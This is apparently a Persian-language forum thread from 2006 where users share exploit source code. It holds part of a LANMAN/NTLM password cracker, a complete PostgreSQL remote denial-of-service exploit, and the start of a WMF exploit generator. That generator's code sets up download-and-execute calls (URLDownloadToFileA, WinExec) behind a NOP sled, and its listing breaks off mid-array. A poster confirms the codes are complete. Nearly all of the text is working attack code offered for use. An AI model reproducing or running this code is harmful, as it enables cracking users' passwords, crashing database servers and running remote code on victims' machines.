  tmpspace[0]=&all_chars[0];
  for (i=1; i<=pwlen; i++) {
     tmpspace[i]=0;
  }


  /* ok here we go, go until that extra pointer gets
     changed... */
  while(!tmpspace[pwlen]) {
     for (i=0; i<=pwlen; i++) {
        if(tmpspace[i] != 0) {
           tmp[i]=*tmpspace[i];
        } else 
          break;
      /* {
           tmp[i]='\0';
          }
       */
     }

  /* printf("%s : %d\n", tmp, strlen(tmp));  */

     if (index->pwdumpval){
       half_lanman(half_hash, tmp);
       if (brute_routine(index, half_hash, tmp, 7) == 1){
#ifdef _DEBUG
         printf("gotone in round %d\n", iter);
         fflush(NULL);
#endif
         nt_ify_list(index);
         print_hits(index, outlist);
         head = prune_list(index);
         if (!head)
           return(1);
         else
           index = head;
       }
     } else {
       if (lm_check_sniff(index, tmp) == 1){
         nt_ify_list(index);
         print_hits(index, outlist);
         head = prune_list(index);
         if (!head)
           return(1);
         else
           index = head;
        }     
     }

     /* increment */
     tmpspace[0]++;

     /* carry ? */
     for (i=0; i<pwlen; i++) {
       if (tmpspace[i] > &all_chars[spacelen -1]) {
         tmpspace[i] = &all_chars[0];

     /*
        can't just inc the pointer but
        this could be removed by playing
        games with the data struct... ;-)
     */
         if (tmpspace[i+1] !=0) {
           tmpspace[i+1]++;
         } else {
           tmpspace[i+1] = &all_chars[0];
         } 
      }
    }
  }

  return(0);
}

void half_lanman(char *half_hash, char *brute_str){
  unsigned char lanman[8];
  des_cblock deskey1;
  des_key_schedule ks1;

  /* create the first 8byte odd parity des key */
  str_to_key((unsigned char *)brute_str, deskey1);  
  /* setup the key schedule */
  des_set_key((des_cblock *)deskey1,ks1); 

  /* encrypt the known 8byte value against the first des key */
  des_ecb_encrypt((des_cblock *)str_to_crypt, (des_cblock *)lanman, ks1,\
	 DES_ENCRYPT); 

  memcpy(half_hash, lanman, 8);

}

/* routine to check the LANMAN passwd */
void full_lanman(char *fullhash, char *dict_word){
  unsigned char passwd[14];
  unsigned char lanman[16];
  des_cblock deskey1, deskey2;
  des_key_schedule ks1, ks2;

  memset(passwd, '\0', sizeof(passwd));
  memset(lanman, '\0', sizeof(lanman));

  strncpy(passwd, dict_word, 14);

  str_to_key(passwd, deskey1);  /* create the first 8byte odd 
                                   parity des key */
  des_set_key((des_cblock *)deskey1,ks1); /* setup the key schedule */

  des_ecb_encrypt((des_cblock *)str_to_crypt, /* encrypt the known 
                                                 8byte value */
              (des_cblock *)lanman, ks1, DES_ENCRYPT); /* against the 
                                                   first des key */

  str_to_key(&(passwd[7]), deskey2);
  des_set_key((des_cblock *)deskey2,ks2);

  des_ecb_encrypt((des_cblock *)str_to_crypt,\
                              (des_cblock *)&lanman[8], ks2, DES_ENCRYPT);

  strncpy(fullhash, (const char *)lanman, sizeof(lanman));

}

int brute_routine(struct user_struct *head, char *half_hash, char *brute_str, int iter){
  struct user_struct *index;
  int positive=0;

  index = head;

  while (index != NULL){
	  
    if (index->under7){
	if (memcmp(index->lmhashb, half_hash, 8) == 0){
 		strncpy(index->first_half, brute_str, 7);
		strncpy(index->lmpasswd, brute_str, 7);
		index->lmdone = 1;
		positive = 1;
	}
  }else{
	  if (iter == 7){
		  if (strlen(index->first_half) == 0){
			if (memcmp(index->lmhashb, half_hash, 8) == 0){
				strncpy(index->first_half, brute_str, 7);
				if (strlen(index->second_half) != 0){
					positive=1;
				}
			}
		  }
	  }

	  if (strlen(index->second_half) == 0){
		if (memcmp(&index->lmhashb[8], half_hash, 8) == 0){
			  strncpy(index->second_half, brute_str, 7);
#ifdef _DEBUG
			  printf("snagged second half in round %d\n", iter);
			  fflush(NULL);
#endif
		}
	  }
  }
  if (!(index->under7)){
    if ((strlen(index->first_half) > 0) && (strlen(index->second_half) > 0)){
	  strncpy(index->lmpasswd, index->first_half, 7);
	  strncat(&index->lmpasswd[7], index->second_half, 7);
	  index->lmdone = 1;
	  positive = 1;
    }
  }
  index = index->next;
  }
  return(positive);
}

int lm_check_sniff(struct user_struct *head, char *brute_str){
  struct user_struct *index;
  char pre_lmresp[21];
  char response[24];
  char full_lmhash[16];
  int positive=0;

  index = head;

  while (index != NULL){
	  
    memset(pre_lmresp, '\0', 21);
    full_lanman(full_lmhash, brute_str);
    memcpy(pre_lmresp, full_lmhash, 16);
    E_P24(pre_lmresp, index->server_chall, response);

    if (memcmp(index->lmresp_b, response, 24) == 0){
      memcpy(index->lmpasswd, brute_str, 14);
      memcpy(index->lmhashb, full_lmhash, 16);
      index->lmdone = 1;
      positive = 1;
    }
    index = index->next;
  }
  return(positive);
}

int nt_check_sniff(struct user_struct *head, char *nthash){
  struct user_struct *index;
  char pre_ntresp[21];
  char response[24];
  int positive=0;

  index = head;

  memset(pre_ntresp, '\0', 21);
  memcpy(pre_ntresp, nthash, 16);
  E_P24(pre_ntresp, index->server_chall, response);

  if (memcmp(index->ntresp_b, response, 24) == 0){
    memcpy(index->nthashb, nthash, 16);
    index->ntdone = 1;
    positive = 1;
  }
  return(positive);
}

int issame(char *one, char *two, int len){

  return(memcmp(one, two, len));
}

Source : HackersClub ,@stake ,NewYork Times MGZ
Interpreter : محمد مسافر

**!!!!!!!!!!!!!!!** · 2006-05-07, 03:57 PM

کد HTML:

/* PostgreSQL Remote Reboot <=8.01 
 * writen by ChoiX [choix@unl0ck.org]
 * (c) unl0ck team
 *	info: Server can be rebooted only if plpgsql language is switched on.
 *		To compilate exploit you should have "libpq" library on your box 
 *		and use command $ cc -o pgsql_reboot pgsql_reboot.c -I/usr/local/pgsql/include  -L/usr/local/pgsql/lib -lpq
 *		Root exploits will be released later, coz now it's very dangerous to release it.
 *
 *
 *
 */
#include <stdio.h>
#include <getopt.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <libpq-fe.h>

#define DEFAULT_PORT "5321"
#define DEFAULT_DB "postgresql"
#define FUNC_NAME "uKt_test"
#define TABLE_NAME "unl0ck_table" 

char str[4000];
char create[]="CREATE OR REPLACE FUNCTION %s RETURNS integer AS $$\n";
char declare[] = "DECLARE\n";
char com[] = "\t--%\n";
char varible_REC[] = "\trec RECORD;\n";
char varible_var[] = "\tvar%d varchar := \'BBBB\';\n";
char begin[] = "BEGIN\n";
char select_1[] = "SELECT INTO rec FROM %s WHERE\n";
char select_2[] = "var%d = AAAA AND\n";
char select_3[] = "var1029 = AAAA;\n";
char end[] = "END\n";
char finish[] = "$$ LANGUAGE plpgsql\n";


void usage(char *name){
printf("PostgreSQL Remote DoS <=8.0.1\n");
printf("writen by ChoiX [choix@unl0ck.org]\n");
printf("(c) Unl0ck Research Team [info@unl0ck.org]\n");
printf("Usage: %s -H <host_address> [-P <port>] -u <user_name> -p <password> [-d <database_name>] \n", name);
printf("Default port = %s\nDefault dbname = %s\n", DEFAULT_PORT, DEFAULT_DB);
exit(0);
}

int make_str();

int main(int argc, char *argv[]){
char opt;
char *host = NULL, *port = NULL, *user = NULL, *password = NULL, *dbname = NULL;
struct hostent *he;
PGconn *conn;
PGresult *res;

while((opt = getopt(argc, argv, "H:P:u:p:d:")) != EOF){
	switch(opt){
		case 'H':
			host = optarg;
			break;
		case 'P':
			port = optarg;
			break;
		case 'u':
			user = optarg;
			break;
		case 'p':
			password = optarg;
			break;
		case 'd':
			dbname = optarg;
			break;
		default:
			usage(argv[0]);
			break;
	}
}
if(host == NULL) usage(argv[0]);
if(user == NULL) usage(argv[0]);
if(password == NULL) usage(argv[0]);
if(port == NULL) port = DEFAULT_PORT; 
if(dbname == NULL) dbname = DEFAULT_DB;

printf("\tPostgreSQL Remote DoS <=8.0.1\n");
printf("[*] Host/Port: %s/%s\n", host, port);
printf("[*] DBname/User/Password: %s/%s/%s\n", dbname, user, password); 

conn = PQsetdbLogin(host, port, NULL, NULL, dbname, user, password);
if(PQstatus(conn) == CONNECTION_BAD){
	PQfinish(conn);
	printf("[-] Cannot connect to the database\n");
	exit(1);
}
printf("[+] Connected to the database\n");

make_str();
printf("[+] Command has been generated\n");
res = PQexec(conn, str);
if (PQresultStatus(res) == PGRES_TUPLES_OK){
	printf("[+] Command has been sent\n");
}
if(PQstatus(conn) == CONNECTION_BAD){
	printf("[+] Server has been rebooted\n");
	exit(0);
} else {
	printf("[-] Server hasnt been rebooted\n");
	exit(0);
}
}

int make_str(){
char temp[100];
int i;
int len = sizeof(temp) -1;

//write char create[]
snprintf(temp, len, create, FUNC_NAME); 
strcpy(str,temp);
//write char declare[] 
snprintf(temp, len, begin);
strcat(str, temp);
//write char varible_REC[]
snprintf(temp, len, varible_REC);
strcat(str, temp);
//write char varible_var[]
for(i = 0;i < 1029;i++){
	snprintf(temp, len, varible_var, i);
	strcat(str, temp);
}
//write char begin[]
snprintf(temp, len, begin);
strcat(str, temp);
//write char select_1[]
snprintf(temp, len, select_1, TABLE_NAME);
strcat(str, temp);
//write char select_2[]
for(i = 0;i < 1028;i++){
	snprintf(temp, len, select_2, i);
	strcat(str, temp);
}
//write char select_3[]
snprintf(temp, len, select_3);
strcat(str, temp);
//write char end[]
snprintf(temp, len, temp);
strcat(str, temp);
//write char finish[]
snprintf(temp, len, finish);
strcat(str,temp);

return 0;
}

**irarkh** · 2006-05-08, 01:36 PM

كم كم داره تبديل به تاپيك مرجع ميشه. اين كدها كاملند يا ناقص ؟

**!!!!!!!!!!!!!!!** · 2006-05-08, 02:36 PM

نوشته اصلی توسط irarkh

كم كم داره تبديل به تاپيك مرجع ميشه. اين كدها كاملند يا ناقص ؟

=-=-=-=-=-=-=-=-
کامل هستند.

**!!!!!!!!!!!!!!!** · 2006-05-08, 03:08 PM

کد HTML:

/*
\
/		WMF nDay download() Exploit Generator
\		       by Unl0ck Research Team
/
\
/     greetz: 
			rst/ghc { ed, uf0, fost },
			uKt { choix, nekd0, payhash, antq }, 
			blacksecurity { #black } , 
			0x557 { kaka, swan, sam, nolife }, 
			sowhat, tty64 { izik };

	This sploit is now full shit, so... 
	kiddies party has been started!!!

urs, 
darkeagle
\
/
*/

#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

// Use for find the ASM code
#define PROC_BEGIN                    __asm _emit 0x90 __asm  _emit 0x90\
                                      __asm _emit 0x90 __asm  _emit 0x90\
                                      __asm _emit 0x90 __asm  _emit 0x90\
                                      __asm _emit 0x90 __asm  _emit 0x90
#define PROC_END                       PROC_BEGIN
#define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define SEARCH_LEN                     8
#define MAX_SC_LEN                     2048
#define HASH_KEY                       13

// Define Decode Parameter
#define DECODE_LEN                     21
#define SC_LEN_OFFSET                  7
#define ENC_KEY_OFFSET                 11
#define ENC_KEY                        0xff


// Define Function Addr
#define ADDR_LoadLibraryA              [esi]
#define ADDR_GetSystemDirectoryA       [esi+4]
#define ADDR_WinExec                   [esi+8]
#define ADDR_ExitProcess               [esi+12]
#define ADDR_URLDownloadToFileA        [esi+16]

// Need functions
unsigned char functions[100][128] =
{                                           // [esi] stack layout
   // kernel32 4                           // 00 kernel32.dll
   {"LoadLibraryA"},                       //    [esi]
   {"GetSystemDirectoryA"},                //    [esi+4]
   {"WinExec"},                            //    [esi+8]
   {"ExitProcess"},                        //    [esi+12]
   // urlmon  1                            // 01 urlmon.dll
   {"URLDownloadToFileA"},                 //    [esi+16]
   {""},
};



unsigned char head1[512] = {
	0x01, 0x00, 0x09, 0x00, 0x00, 0x03, 0x52, 0x1F, 0x00, 0x00, 0x06, 0x00, 0x3D, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x18, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
	0xFF, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x03, 0x85, 0x00,
	0xD0, 0x02, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF,
	0xFF, 0xFF, 0x02, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x23, 0x00,
	0xFF, 0xFF, 0xFF, 0xFF, 0x04, 0x00, 0x1B, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x14, 0x00, 0x20, 0x00,
	0xB8, 0x00, 0x32, 0x06, 0x00, 0x00, 0xFF, 0xFF, 0x4F, 0x00, 0x14, 0x00, 0x00, 0x00, 0x4D, 0x00,
	0x69, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x0A, 0x00, 0x54, 0x4E,
	0x50, 0x50, 0x00, 0x00, 0x02, 0x00, 0xF4, 0x03, 0x09, 0x00, 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00,
	0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x03, 0x00, 0x00, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x26, 0x06,
	0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, 0x01, 0x00, 0x00, 0x00,
	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0B, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x0C, 0x02, 0xD0, 0x02, 0xC0, 0x03, 0x04, 0x00, 0x00, 0x00,
	0x04, 0x01, 0x0D, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
	0x1D, 0x06, 0x21, 0x00, 0xF0, 0x00, 0xD0, 0x02, 0xC0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xFC, 0x02, 0x00, 0x00, 0xFF, 0xFF,
	0xFF, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00,
	0xF0, 0x01, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x22, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x00, 0x00, 0x10, 0x00,
	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x16, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x47, 0x00,
	0x00, 0x00, 0x8F, 0x02, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0xC1, 0x02, 0x00, 0x00, 0x08, 0x00,
	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x06, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x0D, 0x00,
	0x00, 0x00, 0xFB, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x01, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0x00, 0x00, 0x00, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x10, 0x00, 0x00, 0x00,
	0x26, 0x06, 0x09, 0x00, 0x16, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90
};

unsigned char head2[15220] = {
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
